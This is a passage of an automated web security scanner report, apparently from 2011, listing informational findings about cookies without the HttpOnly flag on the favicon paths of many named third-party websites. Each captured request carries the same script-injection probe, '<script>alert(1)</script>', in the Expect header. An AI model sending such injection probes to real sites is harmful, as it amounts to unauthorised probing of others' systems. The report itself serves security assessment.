The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.meandmylatina.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:55:38 GMT
Server: Apache
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: RNLBSERVERID=ded355; path=/
Content-Length: 378

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

15.193. http://www.meaningfulbeauty.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meaningfulbeauty.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.meaningfulbeauty.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:08:34 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 479
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-a0a643c=a0a6515:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.194. http://www.medhunters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.medhunters.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.medhunters.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: http://www.healthecareers.com/favicon.ico
Server: Microsoft-IIS/7.5
Date: Wed, 04 May 2011 01:53:37 GMT
Content-Length: 164
Set-Cookie: Coyote-2-a030a12=a020a9b:0; expires=Wed, 04-May-11 03:53:38 GMT; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www.healthecareers.com/favicon.ico">here</a></body>

15.195. http://www.mem.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mem.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mem.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: Kouok4l23n=MDAwM2IyNGVlZmMwMDAwMDAwMDgwQnteZjUxMzE2OTg3NzEz;path=/
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:02:16 GMT


15.196. http://www.meridianschools.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meridianschools.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.meridianschools.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:07:51 GMT
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6219
X-Powered-By: ASP.NET
Last-Modified: Mon, 29 Jun 2009 17:49:22 GMT
ETag: "{EF4A92DB-D842-459E-A663-51E03255F044},1"
ResourceTag: rt:EF4A92DB-D842-459E-A663-51E03255F044@00000000001
Content-Type: image/x-icon
Exires: Tue, 19 Apr 2011 03:07:51 GMT
Cache-Control: private,max-age=0
Content-Length: 1406
Public-Extension: http://schemas.microsoft.com/repl-2
Set-Cookie: PowerSchool_Cookie=862544906.20480.0000; path=/

..............h.......(....... ...............................w/5.`?C..x.[.1.....e").].1.f").h").vWZ.....`#'.m$,.]%*....._%*.....}be.....e%*.\ (.k"*.g%*.h%*.}dh.....i (.f#(.Y!&.e%+.c;@.a!&.k%+.vSW...
...[SNIP]...

15.197. http://www.miami-dadeclerk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.miami-dadeclerk.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.miami-dadeclerk.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 00:52:01 GMT
Content-Length: 2346
Set-Cookie: NSC_xxxsfejs.njbnjebef.hpw=ffffffff09303f0a45525d5f4f58455e445a4a423660;Version=1;Max-Age=1800;path=/
Set-Cookie: citrix_ns_id=V+5+H+LLAolmpwUFYx1d0f3m9MIA1; Domain=.miami-dadeclerk.com; Path=/; HttpOnly
X-Expires-Orig: None
Cache-Control: max-age=3, must-revalidate, private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<titl
...[SNIP]...

15.198. http://www.mibcn.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mibcn.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mibcn.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: bcbsm=r210419866; path=/; expires=Wed, 11 May 2011 08:00:00 GMT
Server: Netscape-Enterprise/6.0
Date: Wed, 04 May 2011 01:40:03 GMT
Content-length: 318
Content-type: image/x-icon

..............(.......(....... ................................................................................................................    .......................    ......    ...............    .........
...[SNIP]...

15.199. http://www.michie.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michie.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.michie.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Object Not Found
Server: www.michie.com 9999
Date: Wed, 04 May 2011 03:27:46 GMT
X-Cnection: close
Content-Length: 4040
Content-Type: text/html
Set-Cookie: BIGipServerlng-ln-michie-http-25577=824233994.59747.0000; path=/
X-RE-Ref: 1 -685644637
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>

<head>
<style>
a:link            {font:8pt/11pt verdana; color:FF0000}
a:visited        {font:8pt/11pt verdana; color:#4e4e4e}
</style>
...[SNIP]...

15.200. http://www.microgaming.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microgaming.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.microgaming.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:18:09 GMT
Set-Cookie: TS4b2b86=d1afa5fa744b2bb8e561787486a4e2d6bb7208f0dcfcaa554dc0a951; Path=/


15.201. http://www.midmichigan.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.midmichigan.org
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.midmichigan.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Type: text/html
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:28:37 GMT
Content-Length: 60
Set-Cookie: TS1d8c95=03770d35edeee9b4c496026431d4b238da8b60e10ef16e944dc0c91e; Path=/

The page cannot be displayed because the expectation failed.

15.202. http://www.misscellania.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.misscellania.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.misscellania.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=1AAF7B50A1A9EE7DB96B93F51D12B4A8.web123; Path=/; HttpOnly
X-ServedBy: web123
Pragma: cache
Cache-Control: private,max-age=604800
Last-Modified: Thu, 28 Sep 2006 10:29:46 GMT
Content-Type: image/png;charset=UTF-8
Content-Length: 18383
Date: Wed, 04 May 2011 02:07:53 GMT
Server: SSWS
Set-Cookie: BIGipServerWebServers=2063706304.20480.0000; path=/

.PNG
.
...IHDR.......t........F....iCCPICC Profile..x...Ok.a......BIQC...
"..$H.ER.V..4.)Mr)..6.n6..&.O.~.=y. xQA.f.Pz(....E.G..*.J.xXws.P.x..a.7...B`.b...4.._.".Ke).M...c...b...\.......y.b......k;
...[SNIP]...

15.203. http://www.mizunousa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mizunousa.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mizunousa.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=ZJVLOYS192.168.100.184CKOLL; path=/
Date: Wed, 04 May 2011 02:00:00 GMT
Server: Apache/2.2.3 (Red Hat)
Content-Length: 472
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.204. http://www.moreplatformbeds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moreplatformbeds.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.moreplatformbeds.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 03:10:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=cyzmth55fd1nlbfgevj421fj; path=/; HttpOnly
Set-Cookie: VisitorID=2245573D; expires=Sun, 03-Jul-2011 03:10:28 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 32920


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<title>The page cannot be found</title>
<meta http-equiv="Content-Languag
...[SNIP]...

15.205. http://www.musclemustangfastfords.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.musclemustangfastfords.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.musclemustangfastfords.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:39:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=fg2lgf45cg5jtoaa5ig5oviw; path=/; HttpOnly
Set-Cookie: UserPuid=2337541158280318506; domain=musclemustangfastfords.com; expires=Wed, 04-May-2061 01:38:59 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... ...........................................................................................................................{.1/1.....MNP...........................
...[SNIP]...

15.206. http://www.mustang50magazine.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mustang50magazine.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mustang50magazine.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:17:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=3ajmtebq3uejcaqaimznr130; path=/; HttpOnly
Set-Cookie: UserPuid=2346033608016811625; domain=mustang50magazine.com; expires=Wed, 04-May-2061 03:17:29 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 1150

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

15.207. http://www.mypicturetown.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mypicturetown.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mypicturetown.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 01:26:25 GMT
Server: Apache
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerga_www_http_pool=2081794240.20480.0000; expires=Sat, 01-May-2021 01:28:04 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.208. http://www.mypilotstore.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mypilotstore.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.mypilotstore.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Set-cookie: SaneID=173.193.214.243-4142460620662; path=/; expires=Wed, 04-May-16 00:55:05 GMT
Date: Wed, 04 May 2011 00:55:05 GMT


15.209. http://www.myskillstutor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myskillstutor.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.myskillstutor.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=YJUNYXS226.83-8000CKMIJ; path=/
Date: Wed, 04 May 2011 01:29:51 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8h mod_jk/1.2.26
Content-Length: 389
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.210. http://www.nationalexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationalexpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nationalexpress.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:20:23 GMT
Set-Cookie: BIGipServerLB_Pool=67835052.0.0000; path=/


15.211. http://www.netitmail.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.netitmail.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.netitmail.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: rd=R3047041162; path=/; expires=Fri, 06-May-2011 13:17:48 GMT
Date: Wed, 04 May 2011 01:47:08 GMT
Server: Apache/1.3.39 (Unix) mod_perl/1.30 mod_gzip/1.3.19.1a mod_ssl/2.8.30 OpenSSL/0.9.7e
Content-Type: text/html; charset=iso-8859-1
Content-Length: 451

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>417 Expectation Failed</TITLE>
</HEAD><BODY>
<H1>Expectation Failed</H1>
The expectation given in the Expect request-header
field
...[SNIP]...

15.212. http://www.northamericanmotoring.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.northamericanmotoring.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.northamericanmotoring.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Date: Wed, 04 May 2011 02:35:36 GMT
Server: Apache
Content-Length: 389
X-Cnection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServernorthamericanmotoring_www_pool=721096876.20480.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.213. http://www.nursingcenter.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nursingcenter.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nursingcenter.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Content-Length: 0
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 02:27:00 GMT
Set-Cookie: BIGipServertest.nursingcenter.com_80=987221002.20480.0000; path=/


15.214. http://www.nuveen.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nuveen.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nuveen.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Set-cookie: SaneID=173.193.214.243-5129342360061; path=/; expires=Wed, 04-May-16 01:41:50 GMT
Date: Wed, 04 May 2011 01:41:49 GMT
Content-Type: image/x-icon
Accept-Ranges: bytes
Last-Modified: Thu, 10 Apr 2008 17:48:10 GMT
ETag: "0a963a339bc81:b54"
Content-Length: 1406

..............h.......(....... ...............................................................................................""".))).UUU.MMM.BBB.999..|..PP........................3...f..........3...3
...[SNIP]...

15.215. http://www.ocfl.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ocfl.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ocfl.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=PKKPKPS192.168.255.102CKOWK; path=/
Content-Length: 0
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-UA-Compatible: IE=7
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:26:57 GMT


15.216. http://www.oecd.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oecd.org
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.oecd.org
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Set-Cookie: vgnvisitor=hg80M0001pg000HMjs2XqoB3~0; path=/; expires=Saturday, 06-Sep-2014 23:50:08 GMT
Date: Wed, 04 May 2011 02:35:21 GMT
Content-Type: image/x-icon
Accept-Ranges: bytes
Last-Modified: Mon, 14 Feb 2011 14:35:52 GMT
ETag: "094d07a54cccb1:b03"
Content-Length: 1150
Set-Cookie: BipCookie=1157759168.20480.0000; path=/

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

15.217. http://www.ohloh.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ohloh.net
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ohloh.net
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Wed, 04 May 2011 01:59:15 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Thu, 13 Jan 2011 18:03:07 GMT
Connection: keep-alive
Vary: Accept-Encoding
Expires: Wed, 04 May 2011 13:59:15 GMT
Cache-Control: max-age=43200
X-Host: sfo-web-5.blackducksoftware.com
Set-Cookie: uid=rB0lN03AsvNSoU1wHQEIAg==; expires=Thu, 03-May-12 01:59:15 GMT; path=/
Accept-Ranges: bytes

............ .h.......(....... ..... .........................750.750.750.750.750.EC?.....EC?.750.750.750.750.750.750.750.750.750.750.750.750.750.EC?.....EC?.750.750.750.750.750.750.750.750.750.750.LJ
...[SNIP]...

15.218. http://www.opt-intelligence.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opt-intelligence.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.opt-intelligence.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Set-Cookie: ARPT=MLVJMZS192.168.1.209CKMYW; path=/
Date: Wed, 04 May 2011 02:55:27 GMT
Server: Apache/2.0.52 (Red Hat)
Content-Length: 480
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>417 Expectation Failed</title>
</head><body>
<h1>Expectation Failed</h1>
<p>The expectation given in the Expect request-header
fi
...[SNIP]...

15.219. http://www.optimahealth.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.optimahealth.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
